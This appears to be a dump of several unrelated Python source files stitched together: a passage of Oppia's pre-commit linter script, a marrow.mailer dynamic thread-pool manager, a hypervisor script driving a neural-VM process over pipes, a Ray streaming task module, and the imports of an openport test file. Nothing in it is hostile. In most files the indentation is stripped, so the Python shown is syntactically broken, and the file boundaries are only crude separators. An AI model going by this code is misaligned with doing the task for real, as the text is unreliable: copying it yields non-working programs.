python -m scripts.linters.pre_commit_linter
--files filepath_1 filepath_2 ... filepath_n
4. To lint files in verbose mode
python -m scripts.linters.pre_commit_linter --verbose
5. To lint a specific list of file extensions. Separate file
extensions by spaces
python -m scripts.linters.pre_commit_linter
--only-check-file-extensions py js
6. To run a shard of the lint tests
python -m scripts.linters.pre_commit_linter --shard shard_name
Shards are defined in the SHARDS constant in this file.
Note that the root folder MUST be named 'oppia'.
"""
from __future__ import annotations
import argparse
import fnmatch
import multiprocessing
import os
import re
import subprocess
import sys
import threading
from core import python_utils
# Install third party dependencies before proceeding.
from . import codeowner_linter
from . import css_linter
from . import general_purpose_linter
from . import html_linter
from . import js_ts_linter
from . import linter_utils
from . import other_files_linter
from . import python_linter
from .. import common
from .. import concurrent_task_utils
from .. import install_third_party_libs
OTHER_SHARD_NAME = 'other'
SHARDS = {
'1': [
'core/templates/',
'extensions/',
'core/tests/',
'core/storage/',
'core/controllers/',
'core/platform',
'core/jobs/',
],
'other': None,
}
_PARSER = argparse.ArgumentParser()
_EXCLUSIVE_GROUP = _PARSER.add_mutually_exclusive_group()
_PARSER.add_argument(
'--path',
help='path to the directory with files to be linted',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--files',
nargs='+',
help='specific files to be linted. Space separated list',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--verbose',
help='verbose mode. All details will be printed.',
action='store_true')
_PARSER.add_argument(
'--only-check-file-extensions',
nargs='+',
choices=['html', 'css', 'js', 'ts', 'py', 'other'],
help='specific file extensions to be linted. Space separated list. '
    'If either js or ts is used, then both js and ts files will be linted.',
action='store')
_PARSER.add_argument(
'--shard',
help='Name of shard to run lint checks for')
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PATHS_TO_INSERT = [
os.getcwd(),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME, 'lib', 'yaml-3.10'),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME, 'lib', 'jinja2-2.6'),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'webtest-%s' % common.WEBTEST_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'PyGithub-%s' % common.PYGITHUB_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools',
'setuptools-%s' % common.SETUPTOOLS_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'Pillow-%s' % common.PILLOW_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'protobuf-%s' % common.PROTOBUF_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'psutil-%s' % common.PSUTIL_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'pip-tools-%s' % common.PIP_TOOLS_VERSION),
common.THIRD_PARTY_PYTHON_LIBS_DIR
]
for path in _PATHS_TO_INSERT:
sys.path.insert(0, path)
class FileCache:
"""Provides thread-safe access to cached file content."""
def __init__(self):
self._CACHE_DATA_DICT = {}
def read(self, filepath, mode='r'):
"""Returns the data read from the file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
str. The data read from the file.
"""
return self._get_data(filepath, mode)[0]
def readlines(self, filepath, mode='r'):
"""Returns the tuple containing data line by line as read from the
file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str). The tuple containing data line by line as read from the
file.
"""
return self._get_data(filepath, mode)[1]
def _get_data(self, filepath, mode):
"""Returns the collected data from the file corresponding to the given
filepath.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str, tuple(str)). The tuple containing data read from the file
as first element and tuple containing the text line by line as
second element.
"""
key = (filepath, mode)
if key not in self._CACHE_DATA_DICT:
with python_utils.open_file(filepath, mode, newline='') as f:
lines = f.readlines()
self._CACHE_DATA_DICT[key] = (''.join(lines), tuple(lines))
return self._CACHE_DATA_DICT[key]
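# Illustrative sketch (not part of the original script): minimal direct use of
# the FileCache defined above. The 'filepath' argument is hypothetical; any
# text file readable via python_utils.open_file would work.
def _example_file_cache_usage(filepath):
    """Reads a file twice through a FileCache to show the caching behaviour."""
    cache = FileCache()
    # The first access reads the file from disk and caches (text, lines).
    full_text = cache.read(filepath)
    # A later access with the same (filepath, mode) key is served from cache.
    lines_tuple = cache.readlines(filepath)
    return full_text, lines_tuple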
def _get_linters_for_file_extension(file_extension_to_lint, namespace, files):
"""Return linters for the given file extension type.
Args:
file_extension_to_lint: str. The file extension to be linted.
namespace: multiprocessing.Namespace. Namespace in which to execute
this function.
files: dict(str, list(str)). The mapping of filetypes to list of files.
Returns:
(CustomLintChecks, ThirdPartyLintChecks). A 2-tuple containing objects
of lint check classes to run in parallel processing.
"""
namespace.files = FileCache()
file_cache = namespace.files
parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
custom_linters = []
third_party_linters = []
file_extension_type_js_ts = file_extension_to_lint in ('js', 'ts')
if file_extension_type_js_ts:
general_files_to_lint = files['.js'] + files['.ts']
elif file_extension_to_lint == 'other':
general_files_to_lint = files['other']
else:
general_files_to_lint = files['.%s' % file_extension_to_lint]
custom_linter, third_party_linter = general_purpose_linter.get_linters(
general_files_to_lint, file_cache)
custom_linters.append(custom_linter)
if file_extension_type_js_ts:
custom_linter, third_party_linter = js_ts_linter.get_linters(
files['.js'], files['.ts'], file_cache)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'html':
custom_linter, third_party_linter = html_linter.get_linters(
files['.html'], file_cache)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
config_path_for_css_in_html = os.path.join(
parent_dir, 'oppia', '.stylelintrc')
custom_linter, third_party_linter = css_linter.get_linters(
config_path_for_css_in_html, files['.html'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'css':
config_path_for_oppia_css = os.path.join(
parent_dir, 'oppia', 'core', 'templates', 'css', '.stylelintrc')
custom_linter, third_party_linter = css_linter.get_linters(
config_path_for_oppia_css, files['.css'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'py':
_, third_party_linter = python_linter.get_linters(files['.py'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'other':
custom_linter, _ = codeowner_linter.get_linters(file_cache)
custom_linters.append(custom_linter)
custom_linter, _ = other_files_linter.get_linters(file_cache)
custom_linters.append(custom_linter)
return custom_linters, third_party_linters
def _get_changed_filepaths():
"""Returns a list of modified files (both staged and unstaged)
Returns:
list. A list of filepaths of modified files.
"""
unstaged_files = subprocess.check_output([
'git', 'diff', '--name-only',
'--diff-filter=ACM']).splitlines()
staged_files = subprocess.check_output([
'git', 'diff', '--cached', '--name-only',
'--diff-filter=ACM']).splitlines()
all_changed_filepaths = unstaged_files + staged_files
return [filepath.decode('utf-8') for filepath in all_changed_filepaths]
def _get_all_files_in_directory(dir_path, excluded_glob_patterns):
"""Recursively collects all files in directory and
subdirectories of specified path.
Args:
dir_path: str. Path to the folder to be linted.
excluded_glob_patterns: set(str). Set of all glob patterns
to be excluded.
Returns:
list. A list of files in directory and subdirectories without excluded
files.
"""
files_in_directory = []
for _dir, _, files in os.walk(dir_path):
for file_name in files:
filepath = os.path.relpath(
os.path.join(_dir, file_name), start=os.getcwd())
if not any(
fnmatch.fnmatch(filepath, gp) for gp in
excluded_glob_patterns):
files_in_directory.append(filepath)
return files_in_directory
def _get_file_extensions(file_extensions_to_lint):
"""This function is used to return the file extensions which need to be
linted and checked.
Args:
file_extensions_to_lint: list(str). The list of file extensions to be
linted and checked.
Returns:
list(str). The list of all file extensions
to be linted and checked.
"""
all_file_extensions_type = ['js', 'py', 'html', 'css', 'other']
if file_extensions_to_lint:
# Check if 'js' and 'ts' both are present in file_extensions_to_lint.
js_and_ts_is_present = 'js' in file_extensions_to_lint and (
'ts' in file_extensions_to_lint)
if js_and_ts_is_present:
print(
'Please use only one of "js" or "ts", as we do not have '
'separate linters for JS and TS files. If both these options '
'are used together, then the JS/TS linter will be run twice.')
print('Exiting...')
sys.exit(1)
return set(file_extensions_to_lint)
return all_file_extensions_type
def _get_filepaths_from_path(input_path, namespace=None):
"""Get paths to all lintable files recursively under a path.
This function applies some ignore rules (from .eslintignore) but not
all.
Args:
input_path: str. Path to look for files under.
namespace: multiprocessing.Namespace. Namespace in which to execute
this function.
Returns:
list. Paths to lintable files.
"""
namespace.files = FileCache()
file_cache = namespace.files
input_path = os.path.join(os.getcwd(), input_path)
if not os.path.exists(input_path):
print('Could not locate file or directory %s. Exiting.' % input_path)
print('----------------------------------------')
sys.exit(1)
if os.path.isfile(input_path):
return [input_path]
else:
eslintignore_path = os.path.join(os.getcwd(), '.eslintignore')
excluded_glob_patterns = [
line.strip() for line in file_cache.readlines(eslintignore_path)]
return _get_all_files_in_directory(
input_path, excluded_glob_patterns)
def _get_filepaths_from_non_other_shard(shard, namespace=None):
"""Get paths to lintable files in a shard besides the other shard.
This function applies some ignore rules (from .eslintignore) but not
all.
Args:
shard: str. Shard name.
namespace: multiprocessing.Namespace. Namespace in which to execute
this function.
Returns:
list(str). Paths to lintable files.
"""
filepaths = []
assert shard != OTHER_SHARD_NAME
for filepath in SHARDS[shard]:
filepaths.extend(
_get_filepaths_from_path(filepath, namespace=namespace))
if len(filepaths) != len(set(filepaths)):
# Shards are invalid because of a duplicate file.
for filepath in filepaths:
if filepaths.count(filepath) > 1:
raise RuntimeError(
'%s in multiple shards.' % filepath)
# We exempt this line from test coverage because it is
# un-testable. It should never be reached, but we raise an
# assertion error to catch coding errors above.
raise AssertionError( # pragma: no cover
'There is a file duplicated across shards. '
'We should have been able to find it but failed.')
return filepaths
def _get_filepaths_from_other_shard(namespace=None):
"""Get paths to lintable files in the other shard.
This function applies some ignore rules (from .eslintignore) but not
all. The other shard has the name specified by OTHER_SHARD_NAME.
Returns:
list(str). Paths to lintable files.
"""
all_filepaths = set(
_get_filepaths_from_path(os.getcwd(), namespace=namespace))
filepaths_in_shards = set()
for shard in SHARDS:
if shard == OTHER_SHARD_NAME:
continue
filepaths_in_shards |= set(
_get_filepaths_from_non_other_shard(shard, namespace=namespace))
return list(all_filepaths - filepaths_in_shards)
def _get_all_filepaths(
input_path, input_filenames, input_shard, namespace=None):
"""This function is used to return the filepaths which needs to be linted
and checked.
Args:
input_path: str. The path of the directory to be linted and checked.
input_filenames: list(str). The list of filenames to be linted and
checked, ignored if input_path is specified.
input_shard: str. Name of shard to lint. Ignored if either
input_path or input_filenames are specified.
namespace: multiprocessing.Namespace. Namespace in which to execute
this function.
Returns:
list(str). The list of filepaths to be linted and checked.
"""
if input_path:
all_filepaths = _get_filepaths_from_path(
input_path, namespace=namespace)
elif input_filenames:
valid_filepaths = []
invalid_filepaths = []
for filename in input_filenames:
if os.path.isfile(filename):
valid_filepaths.append(filename)
else:
invalid_filepaths.append(filename)
if invalid_filepaths:
print(
'The following file(s) do not exist: %s\n'
'Exiting.' % invalid_filepaths)
sys.exit(1)
all_filepaths = valid_filepaths
elif input_shard:
if input_shard != OTHER_SHARD_NAME:
all_filepaths = _get_filepaths_from_non_other_shard(
input_shard, namespace=namespace)
else:
all_filepaths = _get_filepaths_from_other_shard(
namespace=namespace)
else:
all_filepaths = _get_changed_filepaths()
# TODO(#12912): The pylint complains about 'pattern' being used out of the
# comprehension, which is not true, this needs to be investigated and fixed.
all_matching_filepaths = [
filename for filename in all_filepaths if not
any(
fnmatch.fnmatch(filename, pattern) for pattern
in general_purpose_linter.EXCLUDED_PATHS
)
]
return all_matching_filepaths
def read_files(file_paths, namespace=None):
"""Read all files to be checked and cache them. This will spin off multiple
threads to increase the efficiency.
"""
namespace.files = FileCache()
file_cache = namespace.files
threads = []
for file_path in file_paths:
thread = threading.Thread(target=file_cache.read, args=(file_path,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def categorize_files(file_paths, files):
"""Categorize all the files and store them in shared variable files.
Args:
file_paths: list(str). Paths to files that should be categorized.
files: dict(str, list(str)). Dictionary into which the files will
be categorized. Keys are file extensions ('.py', '.html', '.ts',
'.js', '.css') or 'other'. Values are lists of files with that file
extension.
"""
all_filepaths_dict = {
'.py': [], '.html': [], '.ts': [], '.js': [], 'other': [], '.css': []
}
for file_path in file_paths:
_, extension = os.path.splitext(file_path)
if extension in all_filepaths_dict:
all_filepaths_dict[extension].append(file_path)
else:
all_filepaths_dict['other'].append(file_path)
files.update(all_filepaths_dict)
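    # Illustration (comment added, not in the original script): a path such as
    # 'core/controllers/base.py' lands in files['.py'], while a path whose
    # extension is not one of the keys above (e.g. 'assets/logo.png') is
    # appended to files['other'].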
def _print_summary_of_error_messages(lint_messages):
"""Print summary of linter error messages.
Args:
lint_messages: list(str). List of linter error messages.
"""
    if lint_messages:
error_message_lines = [
'----------------------------------------',
'Please fix the errors below:',
'----------------------------------------',
] + lint_messages
linter_utils.print_failure_message('\n'.join(error_message_lines))
def _get_task_output(lint_messages, failed, task):
"""Returns output of running tasks.
Args:
lint_messages: list(str). List of summary messages of linter output.
failed: bool. The boolean to check if lint checks fail or not.
task: object(TestingTaskSpec). The task object to get output of linter.
Returns:
bool. The boolean to check if the lint checks fail or not.
"""
if task.task_results:
for task_result in task.task_results:
lint_messages += task_result.trimmed_messages
if task_result.failed:
failed = True
return failed
def _print_errors_stacktrace(errors_stacktrace):
"""Print errors stacktrace caught during linter execution.
Args:
errors_stacktrace: list(str). List of error stacktrace of lint
execution failure.
"""
print('')
print(
'Unable to run the complete lint test, please check '
'the following stack trace and fix the errors:')
print('+--------------------------+')
for stacktrace in errors_stacktrace:
print(stacktrace)
print('--------------------------------------------------')
print('')
print('--------------------------------------------------')
print(
        'Some of the linting functions may not run until the'
        ' above errors get fixed')
def _get_space_separated_linter_name(linter_name):
"""Returns the space separated name of the linter class.
Args:
linter_name: str. Name of the linter class.
Returns:
str. Space separated name of the linter class.
"""
return re.sub(
r'((?<=[a-z])[A-Z]|(?<!\A)[A-Z](?=[a-z]))',
r' \1', linter_name)
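# For illustration (comment added, not in the original script): the regex above
# inserts a space before each capitalized word of a CamelCase class name, e.g.
#   _get_space_separated_linter_name('JsTsLintChecksManager')
#   returns 'Js Ts Lint Checks Manager'.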
def main(args=None):
"""Main method for pre commit linter script that lints Python, JavaScript,
HTML, and CSS files.
"""
# Namespace is used to share values between multiple processes. This cannot
# be used as a global variable since then it leads to hanging of some
# processes.
namespace = multiprocessing.Manager().Namespace()
parsed_args = _PARSER.parse_args(args=args)
# File extension to be linted.
file_extension_types = _get_file_extensions(
parsed_args.only_check_file_extensions)
    # Verbose mode is disabled by default; it is enabled when the --verbose
    # flag is passed on the command line.
verbose_mode_enabled = bool(parsed_args.verbose)
all_filepaths = _get_all_filepaths(
parsed_args.path,
parsed_args.files,
parsed_args.shard,
namespace=namespace
)
install_third_party_libs.main()
common.fix_third_party_imports()
print('Starting Linter....')
if len(all_filepaths) == 0:
print('---------------------------')
print('No files to check.')
print('---------------------------')
return
read_files(all_filepaths, namespace=namespace)
files = multiprocessing.Manager().dict()
categorize_files(all_filepaths, files)
# Prepare custom tasks.
custom_max_concurrent_runs = 25
custom_concurrent_count = min(
multiprocessing.cpu_count(), custom_max_concurrent_runs)
custom_semaphore = threading.Semaphore(custom_concurrent_count)
# Prepare third_party tasks.
third_party_max_concurrent_runs = 2
third_party_concurrent_count = min(
multiprocessing.cpu_count(), third_party_max_concurrent_runs)
third_party_semaphore = threading.Semaphore(third_party_concurrent_count)
custom_linters = []
third_party_linters = []
for file_extension_type in file_extension_types:
if file_extension_type in ('js', 'ts'):
if len(files['.js'] + files['.ts']) == 0:
continue
elif (not file_extension_type == 'other' and not
len(files['.%s' % file_extension_type])):
continue
custom_linter, third_party_linter = _get_linters_for_file_extension(
file_extension_type, namespace, files)
custom_linters += custom_linter
third_party_linters += third_party_linter
# Create tasks.
tasks_custom = []
tasks_third_party = []
for linter in custom_linters:
name = _get_space_separated_linter_name(type(linter).__name__)
task_custom = concurrent_task_utils.create_task(
linter.perform_all_lint_checks, verbose_mode_enabled,
custom_semaphore, name=name)
tasks_custom.append(task_custom)
for linter in third_party_linters:
name = _get_space_separated_linter_name(type(linter).__name__)
task_third_party = concurrent_task_utils.create_task(
linter.perform_all_lint_checks, verbose_mode_enabled,
third_party_semaphore, name=name)
tasks_third_party.append(task_third_party)
    # Execute tasks.
    # The concurrency limit for custom tasks is set to 25 so that they are
    # parallelized enough to use the CPU at full capacity. The limit for
    # third-party tasks is set to 2 because those libraries lint at their
    # fastest on their own (i.e. they may already parallelize internally).
    # Concurrency limit: 25.
concurrent_task_utils.execute_tasks(tasks_custom, custom_semaphore)
# Concurrency limit: 2.
concurrent_task_utils.execute_tasks(
tasks_third_party, third_party_semaphore)
lint_messages = []
failed = False
for task in tasks_custom:
failed = _get_task_output(lint_messages, failed, task)
for task in tasks_third_party:
failed = _get_task_output(lint_messages, failed, task)
errors_stacktrace = concurrent_task_utils.ALL_ERRORS
if errors_stacktrace:
failed = True
_print_errors_stacktrace(errors_stacktrace)
if failed:
_print_summary_of_error_messages(lint_messages)
linter_utils.print_failure_message('\n'.join([
'---------------------------',
'Checks Not Passed.',
'---------------------------']))
sys.exit(1)
else:
linter_utils.print_success_message('\n'.join([
'---------------------------',
'All Checks Passed.',
'---------------------------']))
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when pre_commit_linter.py is used as a
# script.
if __name__ == '__main__': # pragma: no cover
main()
|
dynamic.py
|
# encoding: utf-8
import atexit
import threading
import weakref
import sys
import math
from functools import partial
from marrow.mailer.manager.futures import worker
from marrow.mailer.manager.util import TransportPool
try:
import queue
except ImportError:
import Queue as queue
try:
from concurrent import futures
except ImportError: # pragma: no cover
raise ImportError("You must install the futures package to use background delivery.")
__all__ = ['DynamicManager']
log = __import__('logging').getLogger(__name__)
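# Overview (comment added for clarity, not in the original module): each worker
# thread spawned below pulls at most `maximum` jobs from the shared `jobs`
# queue. A `None` sentinel makes it check whether the executor is shutting
# down; waiting longer than `timeout` seconds for work ("starvation") or using
# up the job budget ("exhaustion") also ends the thread.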
def thread_worker(executor, jobs, timeout, maximum):
i = maximum + 1
try:
while i:
i -= 1
try:
work = jobs.get(True, timeout)
if work is None:
runner = executor()
if runner is None or runner._shutdown:
log.debug("Worker instructed to shut down.")
break
# Can't think of a test case for this; best to be safe.
del runner # pragma: no cover
continue # pragma: no cover
except queue.Empty: # pragma: no cover
log.debug("Worker death from starvation.")
break
else:
work.run()
else: # pragma: no cover
log.debug("Worker death from exhaustion.")
except: # pragma: no cover
log.critical("Unhandled exception in worker.", exc_info=True)
runner = executor()
if runner:
runner._threads.discard(threading.current_thread())
class WorkItem(object):
__slots__ = ('future', 'fn', 'args', 'kwargs')
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except:
e = sys.exc_info()[1]
self.future.set_exception(e)
else:
self.future.set_result(result)
class ScalingPoolExecutor(futures.ThreadPoolExecutor):
def __init__(self, workers, divisor, timeout):
self._max_workers = workers
self.divisor = divisor
self.timeout = timeout
self._work_queue = queue.Queue()
self._threads = set()
self._shutdown = False
self._shutdown_lock = threading.Lock()
self._management_lock = threading.Lock()
atexit.register(self._atexit)
def shutdown(self, wait=True):
with self._shutdown_lock:
self._shutdown = True
for i in range(len(self._threads)):
self._work_queue.put(None)
if wait:
for thread in list(self._threads):
thread.join()
def _atexit(self): # pragma: no cover
self.shutdown(True)
def _spawn(self):
t = threading.Thread(target=thread_worker, args=(weakref.ref(self), self._work_queue, self.divisor, self.timeout))
t.daemon = True
t.start()
with self._management_lock:
self._threads.add(t)
def _adjust_thread_count(self):
pool = len(self._threads)
if pool < self._optimum_workers:
tospawn = int(self._optimum_workers - pool)
log.debug("Spawning %d thread%s." % (tospawn, tospawn != 1 and "s" or ""))
for i in range(tospawn):
self._spawn()
@property
def _optimum_workers(self):
return min(self._max_workers, math.ceil(self._work_queue.qsize() / float(self.divisor)))
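        # Worked example (comment added for clarity, not in the original
        # module): with divisor=10 and 25 queued messages, ceil(25 / 10.0) = 3
        # threads are wanted; the result is always capped at _max_workers.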
class DynamicManager(object):
__slots__ = ('workers', 'divisor', 'timeout', 'executor', 'transport')
name = "Dynamic"
Executor = ScalingPoolExecutor
def __init__(self, config, transport):
self.workers = int(config.get('workers', 10)) # Maximum number of threads to create.
self.divisor = int(config.get('divisor', 10)) # Estimate the number of required threads by dividing the queue size by this.
self.timeout = float(config.get('timeout', 60)) # Seconds before starvation.
self.executor = None
self.transport = TransportPool(transport)
super(DynamicManager, self).__init__()
def startup(self):
log.info("%s manager starting up.", self.name)
log.debug("Initializing transport queue.")
self.transport.startup()
workers = self.workers
log.debug("Starting thread pool with %d workers." % (workers, ))
self.executor = self.Executor(workers, self.divisor, self.timeout)
log.info("%s manager ready.", self.name)
def deliver(self, message):
# Return the Future object so the application can register callbacks.
# We pass the message so the executor can do what it needs to to make
# the message thread-local.
return self.executor.submit(partial(worker, self.transport), message)
def shutdown(self, wait=True):
log.info("%s manager stopping.", self.name)
log.debug("Stopping thread pool.")
self.executor.shutdown(wait=wait)
log.debug("Draining transport queue.")
self.transport.shutdown()
log.info("%s manager stopped.", self.name)
|
hypervisor.py
|
"""
HV (main, interactive commands)
<-> IO, source code, nvm directives
NVM (network, encoding, build tools)
<-> network state, viz directives
VIZ (viz)
"""
import sys, time
import multiprocessing as mp
import nvm
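# Protocol note (comment added for clarity, not in the original script): the
# Hypervisor and the NVM process exchange plain strings over a multiprocessing
# Pipe. Most commands are a single request followed by a single reply; 'input'
# and 'set_instruction' are multi-step exchanges in which further tokens (the
# input token, or the opcode and operands terminated by 'end operation') follow
# the initial command.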
class NotRunningError(Exception):
pass
class Hypervisor:
def startup(self, period=1):
self.nvm_pipe, other_end = mp.Pipe()
self.nvm_process = mp.Process(target=run_nvm, args=(other_end, period))
self.nvm_process.start()
self.running = True
def exchange_with_nvm(self, message):
if not self.running: raise NotRunningError()
self.nvm_pipe.send(message)
response = self.nvm_pipe.recv()
return response
def print_nvm(self):
response = self.exchange_with_nvm('print')
print(response)
def show(self):
response = self.exchange_with_nvm('show')
print(response)
def hide(self):
response = self.exchange_with_nvm('hide')
print(response)
def input(self, token):
ready = self.exchange_with_nvm('input')
response = self.exchange_with_nvm(token)
print(ready,response)
def output(self):
response = self.exchange_with_nvm('output')
return response
def set_instruction(self, opcode, *operands):
ready = self.exchange_with_nvm('set_instruction')
opcode_response = self.exchange_with_nvm(opcode)
for operand in operands:
operand_response = self.exchange_with_nvm(operand)
response = self.exchange_with_nvm('end operation')
def shutdown(self):
self.exchange_with_nvm('shutdown')
self.nvm_process.join()
self.nvm_pipe = None
self.nvm_process = None
self.running = False
def quit(self):
if self.running: self.shutdown()
sys.exit(0)
def run_nvm(hv_pipe, period):
# Init NVM
vm = nvm.mock_nvm(layer_size=24)
done = False
while not done:
# step the network
start_time = time.time()
vm.tick()
# process next message
if hv_pipe.poll():
message = hv_pipe.recv()
if message == 'print':
string = 'happy'
hv_pipe.send(string)
if message == 'show':
vm.show()
hv_pipe.send('showing')
if message == 'hide':
vm.hide()
hv_pipe.send('hiding')
if message == 'input':
hv_pipe.send('accepting input')
token = hv_pipe.recv()
vm.set_input(token, 'stdio', from_human_readable=True)
hv_pipe.send('received %s'%token)
if message == 'output':
token = vm.get_output('stdio',to_human_readable=True)
hv_pipe.send(token)
if message == 'set_instruction':
hv_pipe.send('accepting operation')
opcode = hv_pipe.recv()
                hv_pipe.send('received opcode')
operands = []
while True:
message = hv_pipe.recv()
hv_pipe.send('received operand')
if message == 'end operation': break
operands.append(message)
vm.set_instruction(opcode, *operands)
hv_pipe.send('received operation')
if message == 'shutdown':
vm.hide() # shutdown visualizer if running
done = True
hv_pipe.send('shutdown')
# wait up to period
duration = time.time() - start_time
if duration < period:
time.sleep(period - duration)
if __name__ == '__main__':
period = .1
# Start hypervisor
hv = Hypervisor()
hv.startup(period=period)
hv.show()
time.sleep(period)
hv.input('TRUE')
time.sleep(period)
hv.set_instruction('set','NIL','{0}')
time.sleep(period)
# hv.shutdown()
listener_program = """
set NIL {0} # NIL for exiting loop
loop: get rvmio {1} # get input
compare {0} {1} {2} # compare with NIL
nor {2} {2} {3} # true if not NIL
jump {3} loop # if not NIL, repeat
put rvmio {0}
# end
nop
"""
echo_program = """
set NIL {0} # NIL for exiting loop
loop: get rvmio {1} # get input
put rvmio {1} # echo
compare {0} {1} {2} # compare with NIL
nor {2} {2} {3} # true if not NIL
jump {3} loop # if not NIL, repeat
put rvmio {0}
# end
nop
"""
# if __name__ == '__main__':
# rvm = refvm.RefVM()
# rvmio = refvm.RefIODevice(rvm.machine_readable, rvm.human_readable)
# rvm.install_device('rvmio',rvmio)
# # assembly_code = listener_program
# assembly_code = echo_program
# object_code, label_table = rvm.assemble(assembly_code)
# rvm.load(object_code, label_table)
# hv = Hypervisor()
# print('Starting...')
# hv.start(rvm, rvmio, period=1.0/10)
# hv.show()
|
task.py
|
import logging
import threading
from abc import ABC, abstractmethod
from ray.streaming.collector import OutputCollector
from ray.streaming.config import Config
from ray.streaming.context import RuntimeContextImpl
from ray.streaming.runtime import serialization
from ray.streaming.runtime.serialization import \
PythonSerializer, CrossLangSerializer
from ray.streaming.runtime.transfer import ChannelID, DataWriter, DataReader
logger = logging.getLogger(__name__)
class StreamTask(ABC):
"""Base class for all streaming tasks. Each task runs a processor."""
def __init__(self, task_id, processor, worker):
self.task_id = task_id
self.processor = processor
self.worker = worker
self.reader = None # DataReader
self.writers = {} # ExecutionEdge -> DataWriter
self.thread = None
self.prepare_task()
self.thread = threading.Thread(target=self.run, daemon=True)
def prepare_task(self):
channel_conf = dict(self.worker.config)
channel_size = int(
self.worker.config.get(Config.CHANNEL_SIZE,
Config.CHANNEL_SIZE_DEFAULT))
channel_conf[Config.CHANNEL_SIZE] = channel_size
channel_conf[Config.CHANNEL_TYPE] = self.worker.config \
.get(Config.CHANNEL_TYPE, Config.NATIVE_CHANNEL)
execution_graph = self.worker.execution_graph
execution_node = self.worker.execution_node
# writers
collectors = []
for edge in execution_node.output_edges:
output_actors_map = {}
task_id2_worker = execution_graph.get_task_id2_worker_by_node_id(
edge.target_node_id)
for target_task_id, target_actor in task_id2_worker.items():
channel_name = ChannelID.gen_id(self.task_id, target_task_id,
execution_graph.build_time())
output_actors_map[channel_name] = target_actor
if len(output_actors_map) > 0:
channel_ids = list(output_actors_map.keys())
target_actors = list(output_actors_map.values())
logger.info(
"Create DataWriter channel_ids {}, target_actors {}."
.format(channel_ids, target_actors))
writer = DataWriter(channel_ids, target_actors, channel_conf)
self.writers[edge] = writer
collectors.append(
OutputCollector(writer, channel_ids, target_actors,
edge.partition))
# readers
input_actor_map = {}
for edge in execution_node.input_edges:
task_id2_worker = execution_graph.get_task_id2_worker_by_node_id(
edge.src_node_id)
for src_task_id, src_actor in task_id2_worker.items():
channel_name = ChannelID.gen_id(src_task_id, self.task_id,
execution_graph.build_time())
input_actor_map[channel_name] = src_actor
if len(input_actor_map) > 0:
channel_ids = list(input_actor_map.keys())
from_actors = list(input_actor_map.values())
logger.info("Create DataReader, channels {}, input_actors {}."
.format(channel_ids, from_actors))
self.reader = DataReader(channel_ids, from_actors, channel_conf)
def exit_handler():
            # Make DataReader stop reading data when the MockQueue destructor
            # gets called, to avoid a crash.
self.cancel_task()
import atexit
atexit.register(exit_handler)
# TODO(chaokunyang) add task/job config
runtime_context = RuntimeContextImpl(
self.worker.execution_task.task_id,
self.worker.execution_task.task_index, execution_node.parallelism)
logger.info("open Processor {}".format(self.processor))
self.processor.open(collectors, runtime_context)
@abstractmethod
def init(self):
pass
def start(self):
self.thread.start()
@abstractmethod
def run(self):
pass
@abstractmethod
def cancel_task(self):
pass
class InputStreamTask(StreamTask):
"""Base class for stream tasks that execute a
:class:`runtime.processor.OneInputProcessor` or
:class:`runtime.processor.TwoInputProcessor` """
def __init__(self, task_id, processor_instance, worker):
super().__init__(task_id, processor_instance, worker)
self.running = True
self.stopped = False
self.read_timeout_millis = \
int(worker.config.get(Config.READ_TIMEOUT_MS,
Config.DEFAULT_READ_TIMEOUT_MS))
self.python_serializer = PythonSerializer()
self.cross_lang_serializer = CrossLangSerializer()
def init(self):
pass
def run(self):
while self.running:
item = self.reader.read(self.read_timeout_millis)
if item is not None:
msg_data = item.body()
type_id = msg_data[:1]
if (type_id == serialization._PYTHON_TYPE_ID):
msg = self.python_serializer.deserialize(msg_data[1:])
else:
msg = self.cross_lang_serializer.deserialize(msg_data[1:])
self.processor.process(msg)
self.stopped = True
def cancel_task(self):
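        # Cooperative shutdown (comment added for clarity): clearing
        # self.running makes the run() loop exit after its current read, and
        # the busy-wait below blocks until run() confirms by setting
        # self.stopped.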
self.running = False
while not self.stopped:
pass
class OneInputStreamTask(InputStreamTask):
"""A stream task for executing :class:`runtime.processor.OneInputProcessor`
"""
def __init__(self, task_id, processor_instance, worker):
super().__init__(task_id, processor_instance, worker)
class SourceStreamTask(StreamTask):
"""A stream task for executing :class:`runtime.processor.SourceProcessor`
"""
def __init__(self, task_id, processor_instance, worker):
super().__init__(task_id, processor_instance, worker)
def init(self):
pass
def run(self):
self.processor.run()
def cancel_task(self):
pass
|
app_tests.py
|
import urllib2
import subprocess
import unittest
import os
import signal
import sys
from threading import Thread
from unittest import skip
import requests
from time import sleep
import logging
import shutil
import xmlrunner
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from openport.services import osinteraction, dbhandler
